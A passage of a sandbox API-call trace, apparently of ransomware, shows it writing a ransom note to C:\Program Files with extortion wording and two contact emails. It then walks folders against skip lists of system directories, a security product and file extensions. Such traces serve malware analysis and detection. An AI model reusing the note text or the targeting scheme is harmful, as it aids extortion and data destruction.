0 [0136.048] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2d10 | out: hHeap=0xea0000) returned 1 [0136.048] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2b30 | out: hHeap=0xea0000) returned 1 [0136.048] FindClose (in: hFindFile=0xecfc60 | out: hFindFile=0xecfc60) returned 1 [0136.048] Sleep (dwMilliseconds=0x32) [0136.568] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec5a50 | out: hHeap=0xea0000) returned 1 [0136.569] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3008 | out: hHeap=0xea0000) returned 1 [0136.569] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f58 [0136.569] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.569] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4038 [0136.569] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.569] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.569] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee3008 [0136.569] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.569] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee40a8 [0136.569] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1ba0 [0136.569] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee40a8 | out: hHeap=0xea0000) returned 1 [0136.569] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.569] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3008 | out: hHeap=0xea0000) returned 1 [0136.569] CreateFileW (lpFileName="C:\\Program Files\\R3ADM3.txt" (normalized: "c:\\program files\\r3adm3.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2a0 [0136.570] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0136.570] WriteFile (in: hFile=0x2a0, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0136.571] CloseHandle (hObject=0x2a0) returned 1 [0136.571] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec1ba0 | out: hHeap=0xea0000) returned 1 [0136.571] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.571] FindFirstFileW (in: lpFileName="C:\\Program Files\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x57456bd0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57456bd0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xecfbe0 [0136.571] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0136.571] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x57456bd0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x57456bd0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0136.571] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0136.571] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0136.571] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdc5e9c20, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc5e9c20, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Common Files", cAlternateFileName="COMMON~1")) returned 1 [0136.571] lstrcmpW (lpString1="Common Files", lpString2=".") returned 1 [0136.572] lstrcmpW (lpString1="Common Files", lpString2="..") returned 1 [0136.572] StrStrIW (lpFirst="Common Files", lpSrch="tmp") returned 0x0 [0136.572] StrStrIW (lpFirst="Common Files", lpSrch="winnt") returned 0x0 [0136.572] StrStrIW (lpFirst="Common Files", lpSrch="temp") returned 0x0 [0136.572] StrStrIW (lpFirst="Common Files", lpSrch="thumb") returned 0x0 [0136.572] StrStrIW (lpFirst="Common Files", lpSrch="$Recycle.Bin") returned 0x0 [0136.572] StrStrIW (lpFirst="Common Files", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.572] StrStrIW (lpFirst="Common Files", lpSrch="System Volume Information") returned 0x0 [0136.572] StrStrIW (lpFirst="Common Files", lpSrch="Boot") returned 0x0 [0136.572] StrStrIW (lpFirst="Common Files", lpSrch="Windows") returned 0x0 [0136.572] StrStrIW (lpFirst="Common Files", lpSrch="Trend Micro") returned 0x0 [0136.572] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2b30 [0136.572] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.572] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.572] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1ba0 [0136.572] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.572] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.572] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2b30 | out: hHeap=0xea0000) returned 1 [0136.572] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2b30 [0136.572] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc6a8 [0136.572] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec1ba0 | out: hHeap=0xea0000) returned 1 [0136.572] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28ae853d, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x28ae853d, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28ae853d, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0136.572] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0136.572] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0136.572] StrStrIW (lpFirst="desktop.ini", lpSrch=".UAKXC") returned 0x0 [0136.572] StrStrIW (lpFirst="desktop.ini", lpSrch=".exe") returned 0x0 [0136.572] StrStrIW (lpFirst="desktop.ini", lpSrch=".dll") returned 0x0 [0136.572] StrStrIW (lpFirst="desktop.ini", lpSrch=".lnk") returned 0x0 [0136.572] StrStrIW (lpFirst="desktop.ini", lpSrch=".sys") returned 0x0 [0136.572] StrStrIW (lpFirst="desktop.ini", lpSrch=".msi") returned 0x0 [0136.572] StrStrIW (lpFirst="desktop.ini", lpSrch="R3ADM3.txt") returned 0x0 [0136.572] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2ec8 [0136.573] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.573] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.573] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1ba0 [0136.573] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.573] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.573] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2ec8 | out: hHeap=0xea0000) returned 1 [0136.573] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc858 [0136.573] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2ec8 [0136.573] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc8e8 [0136.573] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc858 | out: hHeap=0xea0000) returned 1 [0136.573] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec1ba0 | out: hHeap=0xea0000) returned 1 [0136.573] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0xdc52b540, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc52b540, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DVD Maker", cAlternateFileName="DVDMAK~1")) returned 1 [0136.573] lstrcmpW (lpString1="DVD Maker", lpString2=".") returned 1 [0136.573] lstrcmpW (lpString1="DVD Maker", lpString2="..") returned 1 [0136.573] StrStrIW (lpFirst="DVD Maker", lpSrch="tmp") returned 0x0 [0136.573] StrStrIW (lpFirst="DVD Maker", lpSrch="winnt") returned 0x0 [0136.573] StrStrIW (lpFirst="DVD Maker", lpSrch="temp") returned 0x0 [0136.573] StrStrIW (lpFirst="DVD Maker", lpSrch="thumb") returned 0x0 [0136.573] StrStrIW (lpFirst="DVD Maker", lpSrch="$Recycle.Bin") returned 0x0 [0136.573] StrStrIW (lpFirst="DVD Maker", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.573] StrStrIW (lpFirst="DVD Maker", lpSrch="System Volume Information") returned 0x0 [0136.573] StrStrIW (lpFirst="DVD Maker", lpSrch="Boot") returned 0x0 [0136.573] StrStrIW (lpFirst="DVD Maker", lpSrch="Windows") returned 0x0 [0136.573] StrStrIW (lpFirst="DVD Maker", lpSrch="Trend Micro") returned 0x0 [0136.573] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2ef0 [0136.573] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.573] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.573] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x46) returned 0xec1ba0 [0136.573] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.573] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.573] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee2ef0 | out: hHeap=0xea0000) returned 1 [0136.573] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2ef0 [0136.574] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc858 [0136.574] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec1ba0 | out: hHeap=0xea0000) returned 1 [0136.574] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xdc577800, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc577800, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 1 [0136.574] lstrcmpW (lpString1="Internet Explorer", lpString2=".") returned 1 [0136.574] lstrcmpW (lpString1="Internet Explorer", lpString2="..") returned 1 [0136.574] StrStrIW (lpFirst="Internet Explorer", lpSrch="tmp") returned 0x0 [0136.574] StrStrIW (lpFirst="Internet Explorer", lpSrch="winnt") returned 0x0 [0136.574] StrStrIW (lpFirst="Internet Explorer", lpSrch="temp") returned 0x0 [0136.574] StrStrIW (lpFirst="Internet Explorer", lpSrch="thumb") returned 0x0 [0136.574] StrStrIW (lpFirst="Internet Explorer", lpSrch="$Recycle.Bin") returned 0x0 [0136.574] StrStrIW (lpFirst="Internet Explorer", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.574] StrStrIW (lpFirst="Internet Explorer", lpSrch="System Volume Information") returned 0x0 [0136.574] StrStrIW (lpFirst="Internet Explorer", lpSrch="Boot") returned 0x0 [0136.574] StrStrIW (lpFirst="Internet Explorer", lpSrch="Windows") returned 0x0 [0136.574] StrStrIW (lpFirst="Internet Explorer", lpSrch="Trend Micro") returned 0x0 [0136.574] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.574] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.574] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee40a8 [0136.574] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d68 [0136.574] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee40a8 | out: hHeap=0xea0000) returned 1 [0136.574] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.574] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.574] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2dd8 [0136.574] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec3028 [0136.574] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2d68 | out: hHeap=0xea0000) returned 1 [0136.574] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfa1d4a90, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdc635ee0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc635ee0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Analysis Services", cAlternateFileName="MICROS~2")) returned 1 [0136.574] lstrcmpW (lpString1="Microsoft Analysis Services", lpString2=".") returned 1 [0136.574] lstrcmpW (lpString1="Microsoft Analysis Services", lpString2="..") returned 1 [0136.574] StrStrIW (lpFirst="Microsoft Analysis Services", lpSrch="tmp") returned 0x0 [0136.574] StrStrIW (lpFirst="Microsoft Analysis Services", lpSrch="winnt") returned 0x0 [0136.574] StrStrIW (lpFirst="Microsoft Analysis Services", lpSrch="temp") returned 0x0 [0136.575] StrStrIW (lpFirst="Microsoft Analysis Services", lpSrch="thumb") returned 0x0 [0136.575] StrStrIW (lpFirst="Microsoft Analysis Services", lpSrch="$Recycle.Bin") returned 0x0 [0136.575] StrStrIW (lpFirst="Microsoft Analysis Services", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.575] StrStrIW (lpFirst="Microsoft Analysis Services", lpSrch="System Volume Information") returned 0x0 [0136.575] StrStrIW (lpFirst="Microsoft Analysis Services", lpSrch="Boot") returned 0x0 [0136.575] StrStrIW (lpFirst="Microsoft Analysis Services", lpSrch="Windows") returned 0x0 [0136.575] StrStrIW (lpFirst="Microsoft Analysis Services", lpSrch="Trend Micro") returned 0x0 [0136.575] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc2b8 [0136.575] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.575] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.575] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xee0108 [0136.575] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.575] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.575] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc2b8 | out: hHeap=0xea0000) returned 1 [0136.575] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee2d10 [0136.575] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeccf70 [0136.575] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee0108 | out: hHeap=0xea0000) returned 1 [0136.575] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee2ce510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xdc5053e0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc5053e0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Office", cAlternateFileName="MICROS~1")) returned 1 [0136.575] lstrcmpW (lpString1="Microsoft Office", lpString2=".") returned 1 [0136.575] lstrcmpW (lpString1="Microsoft Office", lpString2="..") returned 1 [0136.575] StrStrIW (lpFirst="Microsoft Office", lpSrch="tmp") returned 0x0 [0136.575] StrStrIW (lpFirst="Microsoft Office", lpSrch="winnt") returned 0x0 [0136.575] StrStrIW (lpFirst="Microsoft Office", lpSrch="temp") returned 0x0 [0136.575] StrStrIW (lpFirst="Microsoft Office", lpSrch="thumb") returned 0x0 [0136.575] StrStrIW (lpFirst="Microsoft Office", lpSrch="$Recycle.Bin") returned 0x0 [0136.575] StrStrIW (lpFirst="Microsoft Office", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.575] StrStrIW (lpFirst="Microsoft Office", lpSrch="System Volume Information") returned 0x0 [0136.575] StrStrIW (lpFirst="Microsoft Office", lpSrch="Boot") returned 0x0 [0136.575] StrStrIW (lpFirst="Microsoft Office", lpSrch="Windows") returned 0x0 [0136.575] StrStrIW (lpFirst="Microsoft Office", lpSrch="Trend Micro") returned 0x0 [0136.575] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.575] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.576] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee40a8 [0136.576] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d68 [0136.576] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee40a8 | out: hHeap=0xea0000) returned 1 [0136.576] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.576] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.576] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee66c8 [0136.576] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d10 [0136.576] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2d68 | out: hHeap=0xea0000) returned 1 [0136.576] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdbe2d4a0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdbe2d4a0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft SQL Server Compact Edition", cAlternateFileName="MICROS~3")) returned 1 [0136.576] lstrcmpW (lpString1="Microsoft SQL Server Compact Edition", lpString2=".") returned 1 [0136.576] lstrcmpW (lpString1="Microsoft SQL Server Compact Edition", lpString2="..") returned 1 [0136.576] StrStrIW (lpFirst="Microsoft SQL Server Compact Edition", lpSrch="tmp") returned 0x0 [0136.576] StrStrIW (lpFirst="Microsoft SQL Server Compact Edition", lpSrch="winnt") returned 0x0 [0136.576] StrStrIW (lpFirst="Microsoft SQL Server Compact Edition", lpSrch="temp") returned 0x0 [0136.576] StrStrIW (lpFirst="Microsoft SQL Server Compact Edition", lpSrch="thumb") returned 0x0 [0136.576] StrStrIW (lpFirst="Microsoft SQL Server Compact Edition", lpSrch="$Recycle.Bin") returned 0x0 [0136.576] StrStrIW (lpFirst="Microsoft SQL Server Compact Edition", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.576] StrStrIW (lpFirst="Microsoft SQL Server Compact Edition", lpSrch="System Volume Information") returned 0x0 [0136.576] StrStrIW (lpFirst="Microsoft SQL Server Compact Edition", lpSrch="Boot") returned 0x0 [0136.576] StrStrIW (lpFirst="Microsoft SQL Server Compact Edition", lpSrch="Windows") returned 0x0 [0136.576] StrStrIW (lpFirst="Microsoft SQL Server Compact Edition", lpSrch="Trend Micro") returned 0x0 [0136.576] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x50) returned 0xec2d68 [0136.576] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.576] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.576] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xee0108 [0136.576] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.576] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.576] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2d68 | out: hHeap=0xea0000) returned 1 [0136.577] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6768 [0136.577] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xed3a00 [0136.577] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee0108 | out: hHeap=0xea0000) returned 1 [0136.577] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xdc492fc0, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdc492fc0, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Sync Framework", cAlternateFileName="MICROS~4")) returned 1 [0136.577] lstrcmpW (lpString1="Microsoft Sync Framework", lpString2=".") returned 1 [0136.577] lstrcmpW (lpString1="Microsoft Sync Framework", lpString2="..") returned 1 [0136.577] StrStrIW (lpFirst="Microsoft Sync Framework", lpSrch="tmp") returned 0x0 [0136.577] StrStrIW (lpFirst="Microsoft Sync Framework", lpSrch="winnt") returned 0x0 [0136.577] StrStrIW (lpFirst="Microsoft Sync Framework", lpSrch="temp") returned 0x0 [0136.577] StrStrIW (lpFirst="Microsoft Sync Framework", lpSrch="thumb") returned 0x0 [0136.577] StrStrIW (lpFirst="Microsoft Sync Framework", lpSrch="$Recycle.Bin") returned 0x0 [0136.577] StrStrIW (lpFirst="Microsoft Sync Framework", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.577] StrStrIW (lpFirst="Microsoft Sync Framework", lpSrch="System Volume Information") returned 0x0 [0136.577] StrStrIW (lpFirst="Microsoft Sync Framework", lpSrch="Boot") returned 0x0 [0136.577] StrStrIW (lpFirst="Microsoft Sync Framework", lpSrch="Windows") returned 0x0 [0136.577] StrStrIW (lpFirst="Microsoft Sync Framework", lpSrch="Trend Micro") returned 0x0 [0136.577] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebc2b8 [0136.577] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4000 [0136.577] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee4070 [0136.577] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xed3a78 [0136.577] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4070 | out: hHeap=0xea0000) returned 1 [0136.577] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4000 | out: hHeap=0xea0000) returned 1 [0136.577] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebc2b8 | out: hHeap=0xea0000) returned 1 [0136.577] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xee6790 [0136.577] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xee0108 [0136.578] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xed3a78 | out: hHeap=0xea0000) returned 1 [0136.578] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x594863b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x594863b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft Synchronization Services", cAlternateFileName="MID7C0~1")) returned 1 [0136.578] lstrcmpW (lpString1="Microsoft Synchronization Services", lpString2=".") returned 1 [0136.578] lstrcmpW (lpString1="Microsoft Synchronization Services", lpString2="..") returned 1 [0136.578] StrStrIW (lpFirst="Microsoft Synchronization Services", lpSrch="tmp") returned 0x0 [0136.578] StrStrIW (lpFirst="Microsoft Synchronization Services", lpSrch="winnt") returned 0x0 [0136.578] StrStrIW (lpFirst="Microsoft Synchronization Services", lpSrch="temp") returned 0x0 [0136.578] StrStrIW (lpFirst="Microsoft Synchronization Services", lpSrch="thumb") returned 0x0 [0136.578] StrStrIW (lpFirst="Microsoft Synchronization Services", lpSrch="$Recycle.Bin") returned 0x0 [0136.578] StrStrIW (lpFirst="Microsoft Synchronization Services", lpSrch="$RECYCLE.BIN") returned 0x0 [0136.578] StrStrIW (lpFirst="Microsoft Synchronization Services", lpSrch="System Volume Information") returned 0x0 [0136.578] StrStrIW (lpFirst="Microsoft Synchronization Services", lpSrch="Boot") returned 0x0 [0136.578] StrStrIW 